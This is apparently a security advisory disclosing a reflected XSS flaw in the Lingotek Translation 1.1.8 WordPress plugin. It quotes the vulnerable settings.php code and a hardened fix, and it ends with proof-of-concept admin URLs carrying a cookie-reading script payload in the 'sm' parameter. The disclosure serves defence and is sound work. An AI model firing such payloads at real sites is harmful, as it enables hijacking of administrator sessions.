Lingotek Translation 1.1.8 Reflected XSS

Homepage:

https://wordpress.org/plugins/lingotek-translation/

Description:

The value of $_GET['sm'] is echoed back into the page without being escaped.

File: lingotek-translation\admin\settings.php

// The submenu name is taken straight from the request.
$submenu = isset($_GET['sm']) ? $_GET['sm'] : 'account';
$dir = dirname(__FILE__) . '/settings/';
$filename = $dir . 'view-' . $submenu . ".php";
if (file_exists($filename))
  include $filename;
else
  // Fallback branch: the unescaped user-supplied value is written into the HTML response.
  echo "TO-DO: create <i>" . 'settings/view-' . $submenu . ".php</i>";

A similar issue also exists in view-manage.php and view-tutorial.php.
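For comparison, the following is a hardened version of the dispatcher excerpt above. It is an added example written for this advisory, not the plugin's own code. It assumes WordPress's esc_html() is available in the admin context (a htmlspecialchars() fallback is defined so the snippet also runs outside WordPress); the allowlist of submenu names is a constructed assumption, since the real set is whichever view-*.php files the plugin ships.

```php
<?php
// Added example (not the plugin's code): hardened settings.php dispatcher.

// Fallback so the snippet runs outside WordPress; inside WordPress the
// real esc_html() is used. (Assumption for stand-alone execution.)
if (!function_exists('esc_html')) {
    function esc_html($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}

// Constructed allowlist of submenu names; replace with the plugin's real set.
$allowed_submenus = array('account', 'content', 'advanced');

$requested = isset($_GET['sm']) ? (string) $_GET['sm'] : 'account';

// Validate against the allowlist rather than trusting the raw parameter.
// This also pins the include below to one of the known view files.
$submenu = in_array($requested, $allowed_submenus, true) ? $requested : 'account';

$dir = dirname(__FILE__) . '/settings/';
$filename = $dir . 'view-' . $submenu . '.php';

if (file_exists($filename)) {
    include $filename;
} else {
    // Escape on output as well, so nothing that reaches this branch can
    // inject markup into the admin page.
    echo 'TO-DO: create <i>settings/view-' . esc_html($submenu) . '.php</i>';
}
```

Two layers are used on purpose: the allowlist rejects unexpected values before they influence the include, and esc_html() on the fallback message means the response would stay safe even if the allowlist were later widened or bypassed.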

Proof of Concept:

The injected script executes in the browser of an administrator who opens one of the following URLs.

http://wp/wp-admin/admin.php?page=wp-lingotek&sm=<script>alert(document.cookie);</script>
http://wp/wp-admin/admin.php?page=wp-lingotek_settings&sm=<script>alert(document.cookie);</script>
http://wp/wp-admin/admin.php?page=wp-lingotek_tutorial&sm=<script>alert(document.cookie);</script>
http://wp/wp-admin/admin.php?page=wp-lingotek_manage&sm=<script>alert(document.cookie);</script>

Timeline: